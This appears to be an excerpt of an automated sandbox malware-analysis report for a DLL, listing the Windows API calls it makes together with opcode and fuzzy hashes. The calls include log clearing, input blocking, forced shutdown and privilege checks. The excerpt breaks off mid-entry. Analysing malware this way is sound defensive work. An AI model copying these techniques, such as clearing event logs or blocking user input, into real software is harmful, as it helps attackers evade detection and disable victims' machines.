                                                  • Instruction ID: 8e805546ef113c3ac3a2f35078ac83ca8a84d9fad177171d366f9001e7ac871c
                                                  • Opcode Fuzzy Hash: 85dc332e68de125305a9dd3892cc226241b1110390aa54452521c95da12b1cd6
                                                  • Instruction Fuzzy Hash: E8116DB4814311AFE300DF38D8856EABBE4FF89318F444A1DF49CC7290E3B58A458B96
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
                                                  • Process32First.KERNEL32(00000000,?), ref: 10027112
                                                  • CloseHandle.KERNEL32(00000000,00000000,?), ref: 1002715B
                                                    • Part of subcall function 10026F40: CreateToolhelp32Snapshot.KERNEL32(00000008,?,00000000,00000000,?,00000074), ref: 10026F67
                                                    • Part of subcall function 10026F40: Module32First.KERNEL32(00000000,00000000), ref: 10026F7C
                                                    • Part of subcall function 10026F40: lstrcmpiA.KERNEL32(?,?), ref: 10026F9B
                                                    • Part of subcall function 10026F40: Module32Next.KERNEL32(00000000,00000000), ref: 10026FA7
                                                    • Part of subcall function 10026F40: lstrcmpiA.KERNEL32(?,?), ref: 10026FB9
                                                    • Part of subcall function 10026F40: CloseHandle.KERNEL32(00000000), ref: 10026FC4
                                                  • Process32Next.KERNEL32(00000000,?), ref: 10027150
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateFirstHandleModule32NextProcess32SnapshotToolhelp32lstrcmpi
                                                  • String ID:
                                                  • API String ID: 1584622316-0
                                                  • Opcode ID: 0e47aba4332e876abc14e7755c421cd63b0223f9de7432f19338bccb8822ca76
                                                  • Instruction ID: b3f5742757dc67417d80ccb19e15a7cf549f2a7c7405ea7f21a0163c39de1ff2
                                                  • Opcode Fuzzy Hash: 0e47aba4332e876abc14e7755c421cd63b0223f9de7432f19338bccb8822ca76
                                                  • Instruction Fuzzy Hash: 38F0A4B75002116AE750D764FC82EBB76ECEF84790F864529FD4886141EB29DD1482F2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: exitfprintf
                                                  • String ID: %s
                                                  • API String ID: 4243785698-620797490
                                                  • Opcode ID: cf8ee2fa4aef7182d94046dd8935e8230c32919dd7694b2b22ae75c663505201
                                                  • Instruction ID: 5e5f8386bdea3470b8528b236cfecaaff427fcee2975e6dc988a4cda30a7b734
                                                  • Opcode Fuzzy Hash: cf8ee2fa4aef7182d94046dd8935e8230c32919dd7694b2b22ae75c663505201
                                                  • Instruction Fuzzy Hash: C0E06D3E800111AFD200EBA4EC45EAFB7A8EF8A305F448865F54CA7216D735E94987A6
                                                  APIs
                                                  • BlockInput.USER32(00000000), ref: 1001750C
                                                  • BlockInput.USER32(?,?,?,00000000), ref: 10017528
                                                  • BlockInput.USER32(?), ref: 100175D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 70d7b4fe06ccd1aeb7d671d919ba715909ed7347f82ce07ad212871d477d66c2
                                                  • Instruction ID: 7c35041cbc989ced744e84bc2fe7d25f999f3a5f95f372f905baf80f1d985716
                                                  • Opcode Fuzzy Hash: 70d7b4fe06ccd1aeb7d671d919ba715909ed7347f82ce07ad212871d477d66c2
                                                  • Instruction Fuzzy Hash: 8E51F737B485849BC714DF98A452BEEFB65FB85621F0082AFE95987741CB366410C7D0
                                                  APIs
                                                    • Part of subcall function 100089F0: lstrlenA.KERNEL32(?), ref: 10008A21
                                                    • Part of subcall function 100089F0: malloc.MSVCRT ref: 10008A29
                                                    • Part of subcall function 100089F0: lstrcpyA.KERNEL32(00000000,?), ref: 10008A41
                                                    • Part of subcall function 100089F0: CharNextA.USER32(00000002), ref: 10008A6D
                                                    • Part of subcall function 100089F0: CharNextA.USER32(00000002), ref: 10008A8B
                                                    • Part of subcall function 100089F0: GetFileAttributesA.KERNEL32(00000000), ref: 10008ACF
                                                    • Part of subcall function 100089F0: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 10008ADC
                                                    • Part of subcall function 100089F0: GetLastError.KERNEL32 ref: 10008AE6
                                                    • Part of subcall function 100089F0: free.MSVCRT ref: 10008B44
                                                  • FindFirstFileA.KERNEL32(?,?,00000041,00000000,00000000,00000001,?,?,00000000,00000065), ref: 10009BDA
                                                  • FindClose.KERNEL32(00000000,0000006D,?,00000000,00000065), ref: 10009C06
                                                  • FindClose.KERNEL32(00000000,?,00000000,00000065), ref: 10009C21
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CharCloseFileNext$AttributesCreateDirectoryErrorFirstLastfreelstrcpylstrlenmalloc
                                                  • String ID:
                                                  • API String ID: 887710168-0
                                                  • Opcode ID: 6703766433a7eb1751993fb2cde4a4e3e360f15e5c6b0555f0ff15d622da5f13
                                                  • Instruction ID: 7edccb4fe516f4dcd3f53cbb636c582056df7d6c9d487251626477ac035d64a7
                                                  • Opcode Fuzzy Hash: 6703766433a7eb1751993fb2cde4a4e3e360f15e5c6b0555f0ff15d622da5f13
                                                  • Instruction Fuzzy Hash: FC11F3367001104BE714DB24DC91BFAB3D5EB89360F04063AFE1ACB2D6CA776D45C2A4
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10020A10
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 10020A25
                                                  • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10020A30
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 9cd60866ab50a98c35c1f79ff38d4de2054aee1ceee2e1c8484874dd467a29a6
                                                  • Instruction ID: f6f7157a8b3012e72d1b12e548f4c87b378eb29056a0154ccc3d0e26a5706136
                                                  • Opcode Fuzzy Hash: 9cd60866ab50a98c35c1f79ff38d4de2054aee1ceee2e1c8484874dd467a29a6
                                                  • Instruction Fuzzy Hash: 9AF01D7515C380BFE340DB2889C4AABBBE8EBA4640FC45D4EF58943252D234D808CB27
                                                  APIs
                                                  • OpenEventLogA.ADVAPI32(00000000), ref: 1000E57C
                                                  • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 1000E587
                                                  • CloseEventLog.ADVAPI32(00000000), ref: 1000E58A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$ClearCloseOpen
                                                  • String ID:
                                                  • API String ID: 1391105993-0
                                                  • Opcode ID: b719f0b8eb9c5516b5e29b39de37e38f590415d9596412b4ce2da0eade4c8ec0
                                                  • Instruction ID: e2617011e296939ca9cc499396a789e41a2db0335649869ff5bc3c2fc59dee1f
                                                  • Opcode Fuzzy Hash: b719f0b8eb9c5516b5e29b39de37e38f590415d9596412b4ce2da0eade4c8ec0
                                                  • Instruction Fuzzy Hash: B8F0C271504755DBD300DF09CC80B4BBBE8FB88340F800D09F954A7201E775AE088BA6
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 10010656
                                                    • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                    • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                    • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                    • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueWindows
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3672536310-3733053543
                                                  • Opcode ID: 5c3b0d6465ec82876b96f4a11b20ef9413b9959b1a27daeafe2d367ede1fa4d8
                                                  • Instruction ID: 8bb9d6b82e749448676f30d8a34e8541df49bcb33f5f773f867f71790e701dd0
                                                  • Opcode Fuzzy Hash: 5c3b0d6465ec82876b96f4a11b20ef9413b9959b1a27daeafe2d367ede1fa4d8
                                                  • Instruction Fuzzy Hash: E9C01279540B0C2BD450DB509C87F4A32549B24705F544810F7145D1C1EAB9B454497E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2$?
                                                  • API String ID: 0-2669683831
                                                  • Opcode ID: 18b51c0b0597428ade0cc42061073558c06941a66ad1eaaed2ef619ccc6aa044
                                                  • Instruction ID: e59d18c9399794bc595010d9535c4f5fd19f6329648e616369369b2a66f2bfe8
                                                  • Opcode Fuzzy Hash: 18b51c0b0597428ade0cc42061073558c06941a66ad1eaaed2ef619ccc6aa044
                                                  • Instruction Fuzzy Hash: F072E7B4604B429FD368CF29C890B9AF7E5FB88304F118A2DE59D87351EB30A955CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: U,E
                                                  • API String ID: 0-4027942359
                                                  • Opcode ID: bb403865d610320d9d3144d3c8a59b381feae8db40863a7a375d4a88aa33cec3
                                                  • Instruction ID: 62788b8b9c83910406f6e107d4ec69dc7ae710b733b3debf393c051762315612
                                                  • Opcode Fuzzy Hash: bb403865d610320d9d3144d3c8a59b381feae8db40863a7a375d4a88aa33cec3
                                                  • Instruction Fuzzy Hash: 799279B5A002499FDB24CF28C881BEA77E5FF88344F50852EEA49CB351D734EA45CB95
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintf
                                                  • String ID:
                                                  • API String ID: 590974362-0
                                                  • Opcode ID: a311e224d3b611280b0c5575599f5b0587c0543bc42704fd8d91d4ca23e8156e
                                                  • Instruction ID: 808c53847acfdf9216db6dc04b8b7b88a66b939790637f942e3da9d10eba0512
                                                  • Opcode Fuzzy Hash: a311e224d3b611280b0c5575599f5b0587c0543bc42704fd8d91d4ca23e8156e
                                                  • Instruction Fuzzy Hash: 7C72F779A00B045FD320DE16DC81BAB73D5EFC5310F11C42DEAAA87B92EAB4F9418795
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: 10aaac4bc456ae447689e31510077a261fc754ed3121a56b4c63e37c5f0abe01
                                                  • Instruction ID: 18d965c862d77f6eb6f028c9bfcb90855a64683182823b318e471b92e1be12ca
                                                  • Opcode Fuzzy Hash: 10aaac4bc456ae447689e31510077a261fc754ed3121a56b4c63e37c5f0abe01
                                                  • Instruction Fuzzy Hash: E17234B56087009FD358CF28CC85A6BB7E5FBC8304F14892DF99A87351EA75E901DB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-2852464175
                                                  • Opcode ID: 05437cc4da248d0b5c8cb68c61ac51f3f1356b75297161c92043c969fa7b9174
                                                  • Instruction ID: 187d62c811851c58088b2f1c6dce946c8a0fd3b94e8cc69681fc47f369cecc54
                                                  • Opcode Fuzzy Hash: 05437cc4da248d0b5c8cb68c61ac51f3f1356b75297161c92043c969fa7b9174
                                                  • Instruction Fuzzy Hash: 5F824AB5A042459FC758CF18C880AAAFBE5FF88344F14866EE949CB356D770E981CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p
                                                  • API String ID: 0-2181537457
                                                  • Opcode ID: edfbd1ea84352b2c03924f160aafdacb94c23fe558e0d61039c3047b50802fd7
                                                  • Instruction ID: be2f9a982d855fe0acc3e5900786f91d8e30c73ad0c7ec301cb64439d7d24710
                                                  • Opcode Fuzzy Hash: edfbd1ea84352b2c03924f160aafdacb94c23fe558e0d61039c3047b50802fd7
                                                  • Instruction Fuzzy Hash: AB7224756087019FD358CF28CC85A6BB7E5EBC8304F04892EFA9A87351EB35E905DB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P
                                                  • API String ID: 0-3110715001
                                                  • Opcode ID: a1a55364413d3ef89c2f7a60bf0c9569dd49b5adc02bead3b12bba559e93fdfa
                                                  • Instruction ID: b9bb07d46858790f49a63e1c91e25e2bc60055ad9045bf75cb1d2f16ce9dff58
                                                  • Opcode Fuzzy Hash: a1a55364413d3ef89c2f7a60bf0c9569dd49b5adc02bead3b12bba559e93fdfa
                                                  • Instruction Fuzzy Hash: CD5238B56047019FD358CF29C885AABB7EAFBC8340F15892EE98AC7351DB74E805CB51
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _ftol
                                                  • String ID:
                                                  • API String ID: 2545261903-0
                                                  • Opcode ID: 788bfa54aaf249d77fea8fdb862df13636a9a2b59701512f82713b6c71fa2e98
                                                  • Instruction ID: 39c327ed84f0e5412e31c3cf6f5d7e14ba9cb04d76968d844ea3bcd7e96feca9
                                                  • Opcode Fuzzy Hash: 788bfa54aaf249d77fea8fdb862df13636a9a2b59701512f82713b6c71fa2e98
                                                  • Instruction Fuzzy Hash: DC221974A043868FD768CF18C890B9AB7E2FFC8304F11896EE9898B355D730E951CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p
                                                  • API String ID: 0-2181537457
                                                  • Opcode ID: b319f4ba5f98a03de8ddaaeec4595da07a77e3f803edd114fd8979aa377174a4
                                                  • Instruction ID: 84394aafb68977b9913fdc0b420e092136887bd94d60ee04b8eee693fad0dcd3
                                                  • Opcode Fuzzy Hash: b319f4ba5f98a03de8ddaaeec4595da07a77e3f803edd114fd8979aa377174a4
                                                  • Instruction Fuzzy Hash: AA2214726047009FD358CF68C885AABB7E9FB88304F05891DF99EC7351DB74A905DB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-2852464175
                                                  • Opcode ID: b7c368c19ef43085cbd88bfad823d9457c7e6e5029ebf07f9028f357f5e6a29f
                                                  • Instruction ID: 1973868626951cbc4e1e6dbbbaae98c5aea718cf2aa9e198ecfd8e57a8fac991
                                                  • Opcode Fuzzy Hash: b7c368c19ef43085cbd88bfad823d9457c7e6e5029ebf07f9028f357f5e6a29f
                                                  • Instruction Fuzzy Hash: 4722F1B5A142059FCB48CF18C490A9ABBE5FF88310F558A6EFC49CB346D770E941CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 454b192ecfaca2bfeccc7b5d9f1b28ddef83bf891173fbfbdba393ab323421c2
                                                  • Instruction ID: f9911c3756e58d96d67ac0068ac05fe94daea12ae19a9087e13a65d9dc3f6b02
                                                  • Opcode Fuzzy Hash: 454b192ecfaca2bfeccc7b5d9f1b28ddef83bf891173fbfbdba393ab323421c2
                                                  • Instruction Fuzzy Hash: 9F626D74600B428FD734CF29D980A26B7E1FF85650B158A2DE887D7B51D730F94ACBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97e2224dc0ef2b1fc53d62958fd45e5f26a65b99f05693ffc431e4c50dd9cacc
                                                  • Instruction ID: 752e0dd24e133d73b6f08329f2179d760a74bb4bde05081f5036a7f9d25ca0bd
                                                  • Opcode Fuzzy Hash: 97e2224dc0ef2b1fc53d62958fd45e5f26a65b99f05693ffc431e4c50dd9cacc
                                                  • Instruction Fuzzy Hash: AE423A74504B468FC326CF18D480A6BB7F5FF89345F14496DE9868B712D731EA0ACB92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea6ab9f78f90f424b4e1c8bf84860adce0fffc767b65f905f94987ab85e84ed9
                                                  • Instruction ID: 666f91e0f4e9b9f2dd51f1c7e6263b133853ce75cc250038ad35c0a21c5c6ed6
                                                  • Opcode Fuzzy Hash: ea6ab9f78f90f424b4e1c8bf84860adce0fffc767b65f905f94987ab85e84ed9
                                                  • Instruction Fuzzy Hash: 6B02F0B56087458BE704CF28D88071BB7E6EFC5294F46852CF88A87345EB35EE05C7A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4797e064f56f14eac9a7beb65e631e3381fa09ee9f13918a05c30c79d5ca12ac
                                                  • Instruction ID: 41471438a16cbbac6786139d1061e5c3017a9635662bae8005eac138925a0d7c
                                                  • Opcode Fuzzy Hash: 4797e064f56f14eac9a7beb65e631e3381fa09ee9f13918a05c30c79d5ca12ac
                                                  • Instruction Fuzzy Hash: CD3203B56042459FCB68CF28C880B9AB7E5FF88304F15866EED499B345D730EA41CF95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93ee8bca5cde2baf0c05566aa50b24438ee3162d0750a586d2ae3c3b0d521600
                                                  • Instruction ID: b043c869ac5179926d5a1e8effb83bfb3717f461454ef77e12179bfa90a1a6a1
                                                  • Opcode Fuzzy Hash: 93ee8bca5cde2baf0c05566aa50b24438ee3162d0750a586d2ae3c3b0d521600
                                                  • Instruction Fuzzy Hash: E7123AB56087419FD364CF18C880AABB7EAFBC8304F15892DF59A87354EB70E905CB52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fee7c196914236212cbf6e9169511074826eea37e8c3d0b1d703f2e0d494078
                                                  • Instruction ID: 1a638d7773a5ca12cc171d86c85b820f771d11c12247ef6e429a720d86c6be01
